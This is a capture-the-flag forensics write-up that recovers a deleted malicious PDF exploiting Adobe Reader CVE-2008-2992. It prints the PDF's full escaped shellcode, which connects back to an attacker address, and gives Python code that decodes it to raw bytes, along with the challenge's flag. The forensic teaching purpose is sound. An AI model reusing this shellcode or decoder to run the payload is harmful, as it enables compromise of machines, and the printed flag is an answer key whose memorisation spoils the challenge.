Policy Violation Pt.1 142
One of our employees violated the company policy by running a malicious document on the company machine. After we noticed that, he deleted the files. Can you bring them back to make some analysis?
Q1. What is the CVE Number and Date of exploit? Example: crew{CVE-XXXX-XXXX_Date:MM.D.YY}
Policy Violation Pt.2 648
One of our employees violated the company policy by running a malicious document on the company machine. After we noticed that, he deleted the files. Can you bring them back to make some analysis?
Q2. What is the sha1sum of the attacker IP? Example: crew{SHA-1(IP)}
crew{ea424d38af72dd1366a08aad1f47eca3e7ec3d24}
Download link: https://pan.baidu.com/s/1XOosHWU6GiXUX7bp6h0WnQ?pwd=mzy0
The task boils down to finding two things:
1. The CVE number of the exploit that was used
2. The attacker's IP address
Mount the E01 image with FTK; a lot of files turn up right away in the Recycle Bin directory ($Recycle.Bin). Deleted files there are stored as $R<id> data files, so the one named $RD5UESN.pdf is the suspicious one; export it. Its sibling $I<id> record (by the naming convention, $ID5UESN.pdf) holds the original path and the deletion timestamp, which is worth pulling as well for the timeline.
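As an added worked example (my own code, not part of the original writeup), the following script parses a $Recycle.Bin $I metadata record, which is what tells you where the recovered $R file originally lived and when it was deleted. The layout is the public Vista-and-later $I format; the sample record is constructed here with an assumed path and timestamp, since the challenge image's own $I contents are not shown on the page.

```python
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME is 100-ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def index_record_name(data_name: str) -> str:
    """$R<id>.<ext> (file content) pairs with $I<id>.<ext> (metadata) in the
    same per-SID folder under $Recycle.Bin."""
    if not data_name.startswith("$R"):
        raise ValueError("not a $R data file name")
    return "$I" + data_name[2:]


def parse_recycle_bin_index(data: bytes) -> dict:
    """Parse a $I record.

    Layout: u64 version (1 = Vista..8.1, 2 = Windows 10 1511+), u64 original
    file size, u64 FILETIME of deletion, then the original path as UTF-16LE:
    version 1 stores a fixed 520-byte (260-char) null-padded field, version 2
    a u32 character count (including the terminator) followed by the path.
    """
    version, size, deleted = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        raw_path = data[24:24 + 520]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)
        raw_path = data[28:28 + nchars * 2]
    else:
        raise ValueError(f"unknown $I version {version}")
    path = raw_path.decode("utf-16-le").split("\x00", 1)[0]
    return {"version": version, "size": size,
            "deleted_utc": filetime_to_datetime(deleted), "path": path}


def build_index_record(version: int, size: int, deleted_ft: int, path: str) -> bytes:
    """Inverse of the parser; used only to construct sample input here."""
    encoded = (path + "\x00").encode("utf-16-le")
    header = struct.pack("<QQQ", version, size, deleted_ft)
    if version == 1:
        return header + encoded.ljust(520, b"\x00")
    if version == 2:
        return header + struct.pack("<I", len(path) + 1) + encoded
    raise ValueError(f"unknown $I version {version}")


# Constructed sample (assumed path, size and time; not from the challenge image).
# 132223104000000000 is the FILETIME for 2020-01-01 00:00:00 UTC.
SAMPLE_PATH = "C:\\Users\\employee\\Downloads\\invoice.pdf"
SAMPLE_INDEX = build_index_record(2, 34312, 132223104000000000, SAMPLE_PATH)

if __name__ == "__main__":
    print(index_record_name("$RD5UESN.pdf"))   # $ID5UESN.pdf
    print(parse_recycle_bin_index(SAMPLE_INDEX))
```

Run it against the real $I file exported next to the $R file (read it in binary and pass the bytes to parse_recycle_bin_index); the deletion time it returns is the anchor for the "he deleted the files" part of the timeline.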
Out of habit, I threw it into the usual online analysis platforms.
VirusTotal's result gives the CVE number: CVE-2008-2992 (the Adobe Reader util.printf() stack buffer overflow).
Reference article: https://www.cnblogs.com/SunsetR/p/11270981.html
Extract the shellcode with PDF Stream Dumper.
The shellcode is shown below. It is in JavaScript %uXXXX escape form: each token is one 16-bit unit that unescape() lays out little-endian in memory, so %u91f5 is the byte pair f5 91.
%u91f5%u4297%u412f%u3f98%u4b98%u4342%u9197%u999f%u4092%u4046%u9140%u964e%u9691%u4940%ufd98%u4348%uf537%u4891%u4ad6%ufd3f%ufcf9%u3ff9%u48fc%u4299%u9198%u4392%ud643%u2796%u9b37%uf842%u4afd%ud69f%u274f%u4790%u9797%uf999%u4ff8%ufc48%u3f9f%u9bf8%u92f9%u9847%u4e40%uf54f%u3796%u9096%u9b47%u4343%uf599%u4b97%u9243%u4f47%u4648%u484a%u4f4a%u4993%u97f5%u4f46%u2f9b%u474e%uf590%u96f9%u37d6%u4b98%u9298%ud693%u9f96%u4948%uf542%u97f9%u9190%u9347%u46f5%u9798%ud690%ufc2f%u4737%ufc4a%u9647%u9f91%u3ff8%uf590%u46d6%u2ffc%u4741%u9093%ufd97%u4192%ufc46%u2f48%ufc9b%u279b%u3f4a%u4092%u474a%u37f5%u4690%u99d6%u9b9f%uf597%ufc42%u923f%u479b%u2791%u4e47%u9847%uf993%uf549%u9242%uf849%ufc99%uf596%u9bfd%u413f%u4e4f%uf549%u4348%u4f4e%u422f%ud6f8%u4847%ud627%u919b%ud64a%uf5d6%u9927%u4942%u9241%ufdf8%u9190%u92f5%u4096%ud63f%uf9f8%u9296%ufc92%u434f%u99f5%u9146%u904a%u9f46%u9692%u9143%u49d6%u983f%ud646%u99f5%u3f99%u4146%u494f%u98f9%u93f8%u4949%u9646%uf5fd%u9299%u484b%u4349%u4996%u4f4b%u92f9%uf83f%u3f93%u4f97%ufd4f%u27fd%ufd46%u979f%u493f%uf898%u989b%u9890%u4840%u9f27%u9947%u9f4e%u3798%u4f96%u3f3f%u9b43%u4a92%uf537%u274f%u4399%uf94f%u4298%u9846%u272f%u3f4e%uf83f%u48f5%u4e37%ud693%u484b%u9b92%uf592%u4246%u4b49%u4f49%u9746%u484b%u4f97%u9891%u9991%u3740%u47d6%ufc4e%u489f%u4827%ud642%uf541%ufd91%u4642%u4b93%u42f5%u4e42%u434f%u4bfd%u484f%u4a4b%u4efc%u473f%u99d6%u379f%ud62f%u9b93%u2742%u9f46%u2f9f%u47fc%u4290%u9347%u993f%uf542%u279b%u9b9b%u4647%u9899%uf542%u3f91%u274b%uf997%u92fc%u4837%u4e48%u962f%ufc92%u4e4e%u4f96%u4098%uf84b%ufdfc%u273f%ud642%u9837%u4efc%ud696%u3ff5%u92f8%u4a3f%u46d6%u4198%u2f46%u97f5%u98f5%u9296%u27f9%uf590%u49f5%u483f%u91f5%u9f47%ufdf8%u4637%u9fd6%u374e%u4292%u989b%u483f%u4e96%u9693%u9190%u4049%u92f5%u9b42%u4692%u9b97%u434b%u9142%u9f93%uf94b%u9090%u4ed6%u3793%uf8f5%u41f5%u27fd%u4248%uf5f8%u9293%u4f9b%u4842%u9b92%u464a%u4047%uf843%u46f8%u9796%u42fd%u27f9%u4b4e%u4a92%u3743%u9043%u4a37%u9146%u9b96%u4398%u9896%u9043%u4799%ud947%ubfd0%u9478%u642d%u74d9%uf424%u315e%ub1c9%u3159%u197e%u7e03%u8319%ufcee%u619a%u8cd1%u8ad5%u4d2a%ubb89%u29f8%ueec2%u3acc%u0286%ud8a4%u49ad%ua9a2%u45c3%u52fb%u212c%u8ab1%u8d03%uefea%u7102%u23f1%u48e4%u363a%u8de5%u3c8c%u430a%u3458%u7486%u08ed%u741a%u0721%u0e22%ud844%ua2d6%u0947%u639d%uf968%udb2a%uf870%u59ff%u8e49%u28c3%u5bc1%uaab0%u9203%u9d39%u146b%ud30a%u96c7%ud453%uecf7%u26af%uf685%u5474%u7251%ufe6a%u2412%ufe4e%ub3f7%u0c05%ub0b3%u1141%u1442%u2dfa%u9bcf%ua42c%ubf8b%uece8%ua148%u48a9%ude3e%u35a9%u7a9f%ud4a2%ufbf6%u274b%ua1f7%uebdb%u5a3a%u641b%u294c%u2b29%ua5e6%ua401%u3120%ua210%uedd2%ua39a%u0e2c%ueada%u5aea%u848a%ue2db%u5541%u36e3%u5fff%u7973%u5e57%u119d%u61a5%u86b0%u8720%u18e2%u1862%uc943%uc8c2%u032b%u37cd%u2c4b%u5004%uc3e6%u08f0%u7a9f%uc259%u823e%uae74%u0801%u4e7c%uf9cf%u5cf5%u9e38%u9cf5%u0bb9%uf6f5%u9dbd%u6ea2%uf8bc%u3084%u2f3f%u3797%uaebf%u4ca1%u24f6%u3a8d%ua8f7%ubb0d%ua2a1%ud30d%u9715%uc65e%u0259%u5bf3%uadcc%u08a5%uc647%u764b%u49af%u5db4%u8eb3%u234a%u369c%udb22%uc69c%ub1b2%u971c%u4eda%u1832%uae2a%u7199%u2522%u334c%u3ad3%u9545%u3a4d%u0e6a%u417e%ub103%ub67f%ud60d%ub680%ue831%u60bd%u9e08%ub080%u912f%u95b7%u3806%u8ab7%u6959
Decode the %u text into raw bytes (keeping the little-endian unit order; getting it wrong yields garbage that scdbg will not follow), save it, and run it under scdbg. The emulation reveals the address the shellcode connects to.
The attacker IP is 192.168.1.30.
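As an added worked example (my own code, not part of the original writeup), this script performs the conversion step above: it turns the %u-escaped blob into the raw bytes scdbg expects, exactly as unescape() in the exploit's JavaScript would have laid them out in memory, then builds the Pt.2 flag from an IP string. The embedded sample is only the first five tokens of the blob above, constructed so the script runs offline; the find_ipv4_strings pre-check and the shellcode.bin file name are my own additions.

```python
import hashlib
import re
import struct

# Constructed sample: the first five %u tokens of the blob in the writeup, with a
# line break thrown in to mimic the dump's split token. Paste the full blob for real use.
SAMPLE_ESCAPED = "%u91f5%u4297%u412f%u3f98\n%u4b98"

UNICODE_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")


def unescape_shellcode(text: str) -> bytes:
    """Decode JavaScript-style %uXXXX escapes into raw bytes.

    unescape() turns each token into one UTF-16 code unit; on x86 Windows that
    unit sits in memory little-endian, so %u91f5 becomes the bytes f5 91.
    Whitespace is stripped first so a token split across a line break (as
    "%u" / "fcee" is in the dump above) still decodes as one unit.
    """
    compact = "".join(text.split())
    units = UNICODE_ESCAPE.findall(compact)
    if UNICODE_ESCAPE.sub("", compact):
        # Anything left over is not a %uXXXX escape: a truncated copy or stray
        # characters would otherwise silently corrupt the shellcode.
        raise ValueError("blob contains data that is not a %uXXXX escape")
    return b"".join(struct.pack("<H", int(unit, 16)) for unit in units)


def find_ipv4_strings(blob: bytes) -> list[str]:
    """Cheap first pass: dotted quads visible in the decoded bytes.

    Carved shellcode is usually encoded, so an empty result is normal (it is
    for the blob above); scdbg emulation is what revealed the address in the
    writeup. A hit here just saves the emulation step.
    """
    return [m.decode("ascii") for m in re.findall(rb"(?:\d{1,3}\.){3}\d{1,3}", blob)]


def write_for_scdbg(blob: bytes, path: str = "shellcode.bin") -> int:
    """Write the raw bytes for scdbg (scdbg /f shellcode.bin)."""
    with open(path, "wb") as fh:
        return fh.write(blob)


def flag_for_ip(ip: str) -> str:
    """Pt.2 answer format crew{SHA-1(IP)}: SHA-1 over the dotted-quad text."""
    return "crew{" + hashlib.sha1(ip.encode("ascii")).hexdigest() + "}"


if __name__ == "__main__":
    raw = unescape_shellcode(SAMPLE_ESCAPED)
    print(raw.hex())                     # f5919742 2f41983f 984b
    print(find_ipv4_strings(raw))        # [] for the encoded sample
    write_for_scdbg(raw)
    print(flag_for_ip("192.168.1.30"))
```

Feed the whole blob to unescape_shellcode and hand the resulting file to scdbg; the IP scdbg reports is the one to hash for the flag.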